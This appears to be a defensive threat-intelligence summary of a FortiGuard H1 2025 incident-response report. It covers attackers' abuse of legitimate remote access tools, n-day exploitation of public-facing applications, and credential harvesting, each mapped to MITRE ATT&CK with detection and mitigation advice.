Full Report
FortiGuard IR analysis of H1 2025 shows financially motivated actors increasingly abusing valid accounts and legitimate remote access tools to bypass detection, emphasizing the need for identity-centric defenses.
Analysis Summary
# Tool/Technique: Legitimate Remote Access Tools Abuse
## Overview
Financially motivated threat actors in H1 2025 are heavily relying on dropping and using legitimate remote access software (RATs/remote desktop tools) rather than custom malware implants to maintain persistence and control within compromised environments. This technique helps adversaries blend in with normal business activity.
## Technical Details
- Type: Technique (Tool Abuse)
- Platform: Windows (implied by common RAT usage, targeting enterprise environments behind VPNs)
- Capabilities: Establishing remote foothold, secondary persistence, and interactive command execution.
- First Seen: Not explicitly stated for the current abuse trend, but the tools themselves have been widely available.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1133 - External Remote Services
- TA0003 - Persistence
- T1543.003 - Create or Modify System Process: Windows Service (If installed as a service)
- TA0011 - Command and Control
- T1090 - Proxy
- TA0005 - Defense Evasion
- T1218 - Signed Binary Proxy Execution (Legitimate software is inherently signed)
## Functionality
### Core Capabilities
- **Remote Control:** Providing interactive sessions for threat actors to manually control victim systems.
- **Persistence:** Establishing a stable foothold that survives reboots, often by installing the legitimate tool's client or service.
### Advanced Features
- **Stealth/Evasion:** Leveraging well-known, whitelisted, or legitimate business applications (AnyDesk, Splashtop, Atera) to bypass traditional signature-based defenses and blend into network traffic.
- **Versatility:** Tools like AnyDesk, Atera, Splashtop, and ScreenConnect are popular for various remote management tasks, making their presence less suspicious than custom RATs.
## Indicators of Compromise
- File Hashes: N/A (Focus is on the legitimate tooling)
- File Names: AnyDesk, Atera, Splashtop, ScreenConnect (instances dropped or configured by the attacker)
- Registry Keys: N/A
- Network Indicators: The network activity associated with the legitimate software's standard communication ports/protocols, but originating from an unexpected source or accessing an unexpected internal resource.
- Behavioral Indicators: Installation of new remote access services/clients by users or accounts not typically responsible for system administration; connections initiated to known domains associated with these remote support tools from unusual accounts.
## Associated Threat Actors
- Financially Motivated Actors (General reference, specific groups not named in the excerpt).
## Detection Methods
- **Behavioral detection:** Monitoring for the installation or execution of legitimate remote access software by unexpected users or from unexpected initial access points (e.g., following a VPN login).
- **Network monitoring:** Analyzing traffic patterns to/from known remote access service C2 infrastructure that deviates from expected administrative patterns.
- **Application Whitelisting/Control:** Strict policies limiting which applications are permitted to install or execute.
## Mitigation Strategies
- **Identity-centric Defenses:** Strengthening multi-factor authentication (MFA) across all access vectors, especially VPNs.
- **Access Control:** Implementing Zero Trust principles and robust Privileged Access Management (PAM).
- **Behavioral Monitoring:** Deploying solutions capable of User and Entity Behavior Analytics (UEBA) to detect anomalous logins (e.g., valid accounts logging in from unusual geographic locations or at unusual times) leading to tool execution.
- **VPN Hardening:** Tightly controlling which accounts can utilize external remote services like VPNs.
## Related Tools/Techniques
- Compromised Credentials (T1078.003 - Valid Accounts: Local Accounts, T1078.004 - Valid Accounts: Cloud Accounts, T1078.001 - Valid Accounts: Domain Accounts)
- Phishing (Credential Harvesting)
- Infostealers (for initial credential theft)
- Legitimate Access Tools mentioned: AnyDesk, Atera, Splashtop, ScreenConnect.
---
# Tool/Technique: Exploitation of Public-Facing Applications (N-Day)
## Overview
Financially motivated actors are frequently exploiting known, unpatched vulnerabilities (overwhelmingly n-day exploitation) in public-facing applications to gain initial access, which is then immediately leveraged to deploy legitimate remote management software rather than deploying custom malware.
## Technical Details
- Type: Technique (Vulnerability Exploitation)
- Platform: Public-facing servers/appliances (VPNs, web servers, exposed services).
- Capabilities: Gaining initial unauthorized access to the internal network perimeter.
- First Seen: Ongoing methodology, exploiting known vulnerabilities.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- T1190.002 - Exploit Internet-Facing Application
## Functionality
### Core Capabilities
- **Perimeter Breach:** Successfully running exploit code against vulnerable internet-facing services.
- **Foothold Establishment:** Using the crash/command execution resulting from the exploit solely to download and execute secondary, legitimate tools.
### Advanced Features
- **N-Day Focus:** Targeting vulnerabilities that already have published exploit code or reliable information, reducing the development time required for an attack.
## Indicators of Compromise
- File Hashes: N/A (Focus is on exploitation)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic patterns unique to the exploitation of specific CVEs against perimeter devices.
- Behavioral Indicators: Unusual process creation or file drops immediately following traffic directed at known vulnerable services.
## Associated Threat Actors
- Financially Motivated Actors (General reference).
## Detection Methods
- **Patch Management:** Timely application of security updates for all external-facing services.
- **Network Traffic Analysis:** Monitoring inbound traffic for payloads or sequences indicative of known exploit attempts against perimeter systems.
## Mitigation Strategies
- **Vulnerability Management:** Aggressive patching schedules, especially for internet-facing assets.
- **Network Segmentation:** Ensuring exploited public-facing services are strictly segmented from critical internal assets.
- **Defense in Depth:** Employing WAFs or IPS systems configured to detect N-day exploits.
## Related Tools/Techniques
- Valid Account Abuse (often used post-exploitation using the initial access gained).
---
# Tool/Technique: Credential Harvesting & Purchase
## Overview
The primary source of initial access for financially motivated groups remains the use of already compromised credentials, obtained either through phishing campaigns, password reuse leading to external harvesting, or purchasing them from Initial Access Brokers (IABs).
## Technical Details
- Type: Technique (Credential Acquisition)
- Platform: Varies (Email, web services, endpoint credential stores).
- Capabilities: Obtaining valid username/password pairs for network entry.
- First Seen: Ongoing.
## MITRE ATT&CK Mapping
- TA0006 - Credential Access
- T1555 - Credentials from Password Stores
- T1558 - Steal or Forge Kerberos Tickets/Credentials (Implies phishing/reuse leading to system access)
- TA0001 - Initial Access
- T1078.001 - Valid Accounts: Domain Accounts (Leveraging these for VPN access)
## Functionality
### Core Capabilities
- **Phishing:** Executing campaigns to harvest credentials directly from users.
- **IAB Acquisition:** Purchasing lists of compromised organizational credentials.
### Advanced Features
- **Credential Reuse Identification:** Utilizing credentials found online that match internal organizational accounts.
## Indicators of Compromise
- Behavioral Indicators: Successful logins via services like VPNs from unknown or unusual geographic locations immediately following an observed credential exposure event (linking purchased data to active compromise).
## Associated Threat Actors
- Financially Motivated Actors.
## Detection Methods
- **External Monitoring:** Monitoring dark web marketplaces and IAB forums for mentions of their organization's domain/credentials.
- **Anomaly Detection:** Detecting login attempts using credentials flagged as previously exposed in external leaks.
## Mitigation Strategies
- **MFA Mandate:** Enforcing MFA everywhere, especially on VPN access, as the single most effective defense against stolen credentials.
- **User Training:** Continuous security awareness training focused on credential security and phishing recognition.
- **Credential Monitoring:** Implementing services to monitor for organizational credential leaks externally.
## Related Tools/Techniques
- Infostealers (tools used to harvest credentials locally).
- VPN Services (as the common vector for leveraging stolen credentials).